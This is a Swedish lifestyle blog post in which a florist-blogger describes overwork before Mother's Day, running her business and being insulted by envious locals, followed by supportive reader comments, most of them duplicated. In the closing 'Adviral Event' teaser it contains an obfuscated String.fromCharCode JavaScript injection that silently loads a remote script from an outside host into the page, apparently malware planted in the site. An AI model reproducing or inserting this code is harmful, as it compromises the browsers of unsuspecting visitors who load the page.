Jantelagen… missunnsamma människor, Media-hora! Tack men nej tack!

FullSizeRender 34

 

Hej min vän!

Föööööörlåt för dålig uppdatering. Timmarna räcker inte till just nu….. Jag sitter nu i skrivande stund på My’s Blommor. Trött, blöt om fötterna med jord under naglarna och i håret. Jag började strax efter 05:00 imorse, jag är nu inne på min 16 timme…. Men innan jag lämnar butiken så tänkte jag skriva ett par rader här… Förberedelserna är i full gång inför morsdag som vi firar på söndag. Hollands leveranserna avlöser varandra, och jag tillsammans med min FANTASTISKA personal står på tå och gör vårar yttersta för att tillgodose så bra service och sortiment som vi bara kan för alla planteringssugna människor =)

11289546_900948446618574_4661794651244319214_o

Det är just nu högsäsong  My’s Blommor är tungt överbelastat för stunden. Magiskt roligt såklart! =)

Vi har utökat sortimentet med fler odlare och otroligt mycket breddar sortiment. Detta har dragit med sig positiva kunder, nya kunder och en ökad omsättning. -Fantastiskt kul!

Jag gjorde för ca 3år sedan en satsning på ett tillbygge för ca 7.5 miljoner. En stor investering!

Man brukar säga friskt vågat hälften vunnet. Men jag hade bara två alternativ, två steg bak, eller tre steg fram.

-För mig fanns det aldrig några allternativ 😉

Självklart har det varit tufft, det tar tid innan man får en lönsamhet och får tillbaka det man investerat, Men jag ser långsiktigt på det och växer sakta men säkert i en snabbare takt än budgeterat. Jag har alltid mål och nya visioner jag jobbar mot! Jag som företagare blir aldrig ”nöjd” och slappnar av. Jag försöker hela tiden att fortsätta att utvecklas och förbättras. Utan att jämföra mig med andra, jag jämför bara med mig själv….

Men att vara egen företagare, småbarns mamma och bloggare är ett pussel. Ett pussel som jag för varje år som går blir bättre på att hantera. Jag brinner verkligen för det jag gör. Men jagas alltid utav tiden och att försöka hinna med allt på alla plan. Nu är det ”pappa vecka” vilket gör att jag då kan spendera, kvällar nätter och dagar här om det krävs… Butiken sköter sig inte självt….

Ni som följer mig här inne på bloggen och kan se att jag reser en hel del. Jag jobbade förra helgen i Barcelona där jag då gjorde en otroligt rolig plåtning för Love Forever (du hittar dom HÄR ) Det är också ett jobb… Många av er tror att jag bara reser omkring, dricker och äter gott, springer på biopremiärer dricker champagne och lever det goda livet…. Det händer också såklart 😉 Men bloggen ÄR ett jobb. Holland är också ett jobb.Det är alltså tre stycken olika jobb! Så när jag lägger upp en capuccino från schipool i Amsterdam så betyder det INTE att jag är ledig. Normalt sett börjar jag ca 03:00 och jobbar till ca 18-19 på kvällen. Lååååååånga pass 😉 -Men jag älskart! 

MEN, MEN, MEN för varje gång som jag lämnar butiken, för andra jobb så krävs planering, framförhållning OCH strukturering. Jag för-arbetar ALLTID så mycket jag kan innan, beställningar, ordrar, annonser osv är alltid klart. Det är sååååå många timmar som jag sitter uppe sent om nätterna och jobbar…. Jag skriver självklart inte om det här inne varje dag… -jag menar hur kul är det att läsa om?!11171846_688483537922423_454620394_o-1

Men en sak ska jag säga ifrån hjärtat, jag är förbannat trött på missunnsamma människor som baktalar och snackar skit.

I början utav mitt entrepenörskap som 18 åring så tog jag åt mig, blev ledsen och försökte att göra bättre ifrån mig och istället ”ställa mig in” . Det är ett minne blott. Att folk pratar illa om mig bakom min rygg säger mer om personerna ifråga än om mig.

TACK MEN NEJ TACK! jag står över den nivån! 

OM man har någonting att ta upp är det bättre att göra det med mig personligen, jag lovar att ur min mun kommer endast ärliga svar! Här på Öland antingen älskar eller hatar man mig.

Så har det alltid varit sedan jag flyttade till Öland. Även INNAN Ensam Mamma Söker. Jante lagen säger sin sak.Efter Ensam Mamma Söker blev det dock värre…. Att sticka ut är sällan uppskattat…. 

Man har svårt att se framgång och lycka. Man ser gärna bara det man vill se, man ser inte engagemanget, slitet och den tid och dom uppoffringar man gör som ligger bakom eventuell framgång.

Är man inte från Öland så kommer man lixom aldrig riktigt in och blir accepterad. Jag har fantastiska vänner här nere i Kalmar/Öland som alltid finns där och stöttar mig (Älskar er, ni vet vilka ni är) Men saknar helt familj här….

Mina stam kunder är såklart också mina vänner. jag menar inte att alla hatar mig eller pratar illa om mig, men MÅNGA gör det.

Saken är bara den att även lilla jag blivit klokare med åren. Jag är nu 27 år gammal. Jag har insett att det inte är någon ide att lägga energi på att försöka ändra på personers tyck och tänk om mig, då dom flesta dessutom saknar helt personlig erfarenhet utav mig utan istället grundar sina åsikter på hörsägen. Intressant, men också väldigt trångsynt!  Vanliga saker jag får höra är tex, glidare, golddigger, blogg-fitta eller det alra värsta media-hora! -Men hallå! Det är väl ändå inte okay! Så dumt att jag inte ens svara på det! Men jag ville ändå ta upp det här… jag vill genom detta inlägget förmedla att allt inte alltid är svart eller vitt…. Allt är inta alltid en dans på rosor. MEN jag är lycklig och känner mig ändå väldigt tillfreds med livet…..

11069226_691302057640571_2099114842_o-2 11160432_691302104307233_465069469_n-1

Just ikväll så är jag dock väldigt trött… Men det hör ju till, man har ju hög/låg säsong och i vissa perioder så är man helt enkelt trött!Idag är en sån dag…. Jag längtar ihjäl mig efter att komma ut och springa, men hinner inte det just nu…. men snart så 😉 Igår gick jag 17000 steg i butiken, ganska bra motion det också 😉

11187690_691302150973895_865861438_o 11173598_691302144307229_1327846920_n-1

Innan jag låser, larmar och lämnar butiken för dagen så vill jag passa på att ge min fantastiska kollega Vickan en stor eloge.

En stor eloge för sitt engagemang och sin enorma drivkraft! Denna unga floristen dök in i mitt liv som en virvelvind under ganska konstiga omständigheter för ca ett år sedan. Hon har utvecklats något ENORMT! Vickan brinner för att serva kunden, hon är alltid glad, positiv och är en fantastisk team-player! En florist, kollega och vän som alltid strävar framåt. Kunder kommer DAGLIGEN fram och berömmer mig för min personal, även dom andra såklart….. Men Vickan är verkligen en sjärnflorist som kommer att gå långt med sin rätta inställning och personlighet!  -Det är ett privilegium att få jobba tillsammans med dig Vickan

 

 

11227064_901375713242514_2579955867994683450_o

 

NU ska jag hem och krama kudden innan klockan ringer vid 04:40 igen =) Som sagt ber om ursäkt för dåligt med uppdateringar… Det kommer att vara fullt ös medvetslös på My’s Blommor fram till midsommar! Vi hörs imorgon igen! Kram på dig! /My Martens

44 Komentarer

 1. Är det något jag vet så är det hur HÅRT du jobbar. Du är en kvinna att se upp till, att beundra och ha som förebild. Det kan jag som vän stå upp för och gå i bräschen för.
  Jag känner ingen som roddar med så mycket som du!
  Bra att du står på dig och inte tar åt dig fina My!
  Försök att hinna andas emellan. Andas djupt 3 ggr på raken minst 3 ggr per dag. Det är tur att du är ung. ❤️
  Mass kärlek! ❤️

 2. tack för en härlig bladning på din blogg å så fint du verka ha på mys blommor å mycket vackra blommor växter. ja tyvärr finns det allför många människor. öland har jag varit många semestrea ända sedan va liten nu 53 år . underbart vackert å fint där böda sande ekerums camping kopingsvik färjestaden borgholm ,, stuga husvagn tält. älksar öland. du e så enorm duktig å driftig tjej. kramiz

 3. Du är så otroligt duktig och driftig! Ta inte åt dig av dumma människors kommentarer! Dom skulle vilja va lika vacker som du, ha din framåtanda och driftighet! Det är den svenska avundsjukan, den har alltid funnits och kommer alltid att finnas! Till skillnad mot andra länder, så här i Sverige säger man, ”Du ska inte tro att du är nåt” om man lyckas!? Alla är väl nåt, oavsett vem man är eller gör!? Lova att du försöker att kasta sån skit över axeln och gå vidare!? Kramar!

 4. Full av beundran för allt ditt slit. You go girl! Bodde jag inte så långt från Öland så skulle jag bränna bra mycket pengar hos dig, bilderna är verkligen lockande. Alla växter ser så fräscha ut. Sov gott ett oar timmar nu.

 5. Hej
  Det är kanske baksidan av kändis livet, men du är inte den ända.
  Livet är så här eller?
  Man är tvungen att både ge och ta fast man är offentlig, det är kanske baksidan.
  Men du har ju själv valt.
  Lycka till

 6. Tycker du är fantastisk som får ihop allt! … Jag antar att det inte är småbarnsföräldrar med egna företag som är så elaka ?
  Det räcker ju med att få se alla härliga bilder från My’s Blommor för att förstå vilket enormt jobb det ligger bakom! Det är verkligen kul att du valde att börja blogga o låta oss följa med på ett hörn ? Men jag håller med Nina, glöm inte bort o andas också! Kram

 7. Är det något jag vet så är det hur HÅRT du jobbar. Du är en kvinna att se upp till, att beundra och ha som förebild. Det kan jag som vän stå upp för och gå i bräschen för.

  Jag känner ingen som roddar med så mycket som du!

  Bra att du står på dig och inte tar åt dig fina My!

  Försök att hinna andas emellan. Andas djupt 3 ggr på raken minst 3 ggr per dag. Det är tur att du är ung. ❤️

  Mass kärlek! ❤️

 8. tack för en härlig bladning på din blogg å så fint du verka ha på mys blommor å mycket vackra blommor växter. ja tyvärr finns det allför många människor. öland har jag varit många semestrea ända sedan va liten nu 53 år . underbart vackert å fint där böda sande ekerums camping kopingsvik färjestaden borgholm ,, stuga husvagn tält. älksar öland. du e så enorm duktig å driftig tjej. kramiz

 9. Du är så otroligt duktig och driftig! Ta inte åt dig av dumma människors kommentarer! Dom skulle vilja va lika vacker som du, ha din framåtanda och driftighet! Det är den svenska avundsjukan, den har alltid funnits och kommer alltid att finnas! Till skillnad mot andra länder, så här i Sverige säger man, ”Du ska inte tro att du är nåt” om man lyckas!? Alla är väl nåt, oavsett vem man är eller gör!? Lova att du försöker att kasta sån skit över axeln och gå vidare!? Kramar!

 10. Full av beundran för allt ditt slit. You go girl! Bodde jag inte så långt från Öland så skulle jag bränna bra mycket pengar hos dig, bilderna är verkligen lockande. Alla växter ser så fräscha ut. Sov gott ett oar timmar nu.

 11. Hej
  Det är kanske baksidan av kändis livet, men du är inte den ända.
  Livet är så här eller?
  Man är tvungen att både ge och ta fast man är offentlig, det är kanske baksidan.
  Men du har ju själv valt.
  Lycka till

 12. Tycker du är fantastisk som får ihop allt! … Jag antar att det inte är småbarnsföräldrar med egna företag som är så elaka 😉
  Det räcker ju med att få se alla härliga bilder från My’s Blommor för att förstå vilket enormt jobb det ligger bakom! Det är verkligen kul att du valde att börja blogga o låta oss följa med på ett hörn 😉 Men jag håller med Nina, glöm inte bort o andas också! Kram

 13. Jag tror ingen som inte drivit eget företag fattar hur mycket jobb det är. Och jag måste erkänna att jag varit djupt imponerad av dig sedan du startade din affär. Min resa har själv varit skakig med en tom plånbok men när jag har vägarna förbi kikar jag in ändå för ni har så mycket fint. Och en dag ska jag göra en storhandel hos er!

 14. Jag tror ingen som inte drivit eget företag fattar hur mycket jobb det är. Och jag måste erkänna att jag varit djupt imponerad av dig sedan du startade din affär. Min resa har själv varit skakig med en tom plånbok men när jag har vägarna förbi kikar jag in ändå för ni har så mycket fint. Och en dag ska jag göra en storhandel hos er!

 15. Slösa ingen energi på dessa människor, inte värt den.Dom mår oftast väldigt dåligt själva o måste dra ner andra tyvärr. Stå på dig o ta ingen skit. Kram

 16. All heder till dig My! Jobba på, det kommer att bära frukt. Starka & ambitiösa kvinnor verkar vara provocerande. Kanske många går & bär på drömmar, men det är lättare att titta snett & ranka ned än att ta tag i sina egna visioner & förverkliga dem. Många är ju rädda, bekväma & osäkra. Tur att det finns förebilder & modiga kvinnor som du My. Lycka till med ditt företagande. Nästa gång jag besöker Öland ska jag absolut besöka din affär. Ser mycket fram emot det!

 17. Slösa ingen energi på dessa människor, inte värt den.Dom mår oftast väldigt dåligt själva o måste dra ner andra tyvärr. Stå på dig o ta ingen skit. Kram

 18. Nä det är fan inte okey att springa runt och kalla folk elaka saker!
  Det ser så grymt mysigt ut i din butik så någongång när jag är i Kalmar hos bror och svägerska ska jag banne mig åka över och kika in till dig ?
  Ska du gå visning åt Love Forever i år med på Formex? Jag ska börja köra hemmaförsäljning åt dom så jag ska upp på Formex med, hur spännande som helst för en lantis haha.
  http://lotte4.blogspot.se

 19. My ta inte åt dig av andras avundsjuka.
  Du är en helt underbar både Mamma och Företagare önskar dig all lycka till.
  Du är så fin och det strålar om dig så fortsätt som du gör men var rädd om dig.
  LYCKA TILL

 20. All heder till dig My! Jobba på, det kommer att bära frukt. Starka & ambitiösa kvinnor verkar vara provocerande. Kanske många går & bär på drömmar, men det är lättare att titta snett & ranka ned än att ta tag i sina egna visioner & förverkliga dem. Många är ju rädda, bekväma & osäkra. Tur att det finns förebilder & modiga kvinnor som du My. Lycka till med ditt företagande. Nästa gång jag besöker Öland ska jag absolut besöka din affär. Ser mycket fram emot det!

 21. Nä det är fan inte okey att springa runt och kalla folk elaka saker!

  Det ser så grymt mysigt ut i din butik så någongång när jag är i Kalmar hos bror och svägerska ska jag banne mig åka över och kika in till dig 🙂
  Ska du gå visning åt Love Forever i år med på Formex? Jag ska börja köra hemmaförsäljning åt dom så jag ska upp på Formex med, hur spännande som helst för en lantis haha.
  https://lotte4.blogspot.se

 22. My ta inte åt dig av andras avundsjuka.
  Du är en helt underbar både Mamma och Företagare önskar dig all lycka till.
  Du är så fin och det strålar om dig så fortsätt som du gör men var rädd om dig.
  LYCKA TILL

 23. Jag är fantastiskt imponerad av dig My! Det är jag för att du är så ung men ändå åstadkommit så mycket. En fantastisk entreprenör! Och go mamma! Du är otroligt duktig, driven, smart och dessutom jättesnäll och ödmjuk! Den kombinationen besitter inte många. Skitsnackarna kan fuck off med sin avundsjuka! Puss på dig

 24. Jag är fantastiskt imponerad av dig My! Det är jag för att du är så ung men ändå åstadkommit så mycket. En fantastisk entreprenör! Och go mamma! Du är otroligt duktig, driven, smart och dessutom jättesnäll och ödmjuk! Den kombinationen besitter inte många. Skitsnackarna kan fuck off med sin avundsjuka! Puss på dig

 25. Tyvärr får de som varit med i program av det slaget som du mycket kritik, se på Gynning Rosing de har säkert fått utstå en massa struntprat. Men det är myntets baksida av att synas. Tycker du verkar vara en driftig kvinna och Mamma så slå bort så mycket du kan för det är inte ok att bli kallad fula ord.

 26. Du gör helt rätt som inte lyssnar på dem som säger dumma saker. Människor som inte själv vågar chansa och gå utanför sin bekvämlighetzon har svårt att acceptera att andra gör det och dessutom lyckas.
  Bara en tanke, det kanske är dags att befordra Vickan och delegera en del av ditt ansvar till henne? Är du inställd på att växa kan det vara smart att förbereda organisationen för det i god tid så att hon (och andra) har en chans att växa in i sin roll innan den blir alltför krävande. Din tid bör du lägga på det som endast du kan göra och ingen annan. Allting annat kan du på sikt delegera bort, om och när du vill. Det är ingen som tackar dig om du kör dig själv i botten.
  Kram!
  Charlotta

 27. Usch vad trist ! Jantelagen är fruktansvärd ! Att man inte kan glädjas i stället med varandra. Du verkar ju verkligen jobba hårt. Låt inte det ta din energi. Kram

 28. Tyvärr får de som varit med i program av det slaget som du mycket kritik, se på Gynning Rosing de har säkert fått utstå en massa struntprat. Men det är myntets baksida av att synas. Tycker du verkar vara en driftig kvinna och Mamma så slå bort så mycket du kan för det är inte ok att bli kallad fula ord.

 29. Du gör helt rätt som inte lyssnar på dem som säger dumma saker. Människor som inte själv vågar chansa och gå utanför sin bekvämlighetzon har svårt att acceptera att andra gör det och dessutom lyckas.

  Bara en tanke, det kanske är dags att befordra Vickan och delegera en del av ditt ansvar till henne? Är du inställd på att växa kan det vara smart att förbereda organisationen för det i god tid så att hon (och andra) har en chans att växa in i sin roll innan den blir alltför krävande. Din tid bör du lägga på det som endast du kan göra och ingen annan. Allting annat kan du på sikt delegera bort, om och när du vill. Det är ingen som tackar dig om du kör dig själv i botten.
  Kram!
  Charlotta

 30. Usch vad trist ! Jantelagen är fruktansvärd ! Att man inte kan glädjas i stället med varandra. Du verkar ju verkligen jobba hårt. Låt inte det ta din energi. Kram

 31. Hej My!
  Det är sorgligt att läsa att vissa människor har så svårt att visa respekt och vänlighet.
  Alla människor har rätt att leva sitt liv och jobba med det som man trivs med, utan att andra behöver ha synpunkter på det!
  Jag tycker att du är beundransvärd som får ihop allt på det sätt som du gör.
  Kram Susanne.

 32. Hej My!
  Det är sorgligt att läsa att vissa människor har så svårt att visa respekt och vänlighet.
  Alla människor har rätt att leva sitt liv och jobba med det som man trivs med, utan att andra behöver ha synpunkter på det!
  Jag tycker att du är beundransvärd som får ihop allt på det sätt som du gör.
  Kram Susanne.

 33. Jag är en Ölänning och jag varken älskar eller hatar dig. Jag tycker du är stark, drivkraftig och har ett jävlar anammar utan dess like. Detta ser jag upp till. Men jag känner dig inte och jag kan därför inte uttala mig om hurdan du är. Många är nog avundsjuka pga ditt kändisskap och i vissa fall kan jag förstå dem. Kokurrans är ett hot, men många är det bara ren och skär avundsjuka och de behöver man ju inte bry sig om. ALLS! Lycka till med alla jobb och va rädd om dig.

 34. Jag är en Ölänning och jag varken älskar eller hatar dig. Jag tycker du är stark, drivkraftig och har ett jävlar anammar utan dess like. Detta ser jag upp till. Men jag känner dig inte och jag kan därför inte uttala mig om hurdan du är. Många är nog avundsjuka pga ditt kändisskap och i vissa fall kan jag förstå dem. Kokurrans är ett hot, men många är det bara ren och skär avundsjuka och de behöver man ju inte bry sig om. ALLS! Lycka till med alla jobb och va rädd om dig.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/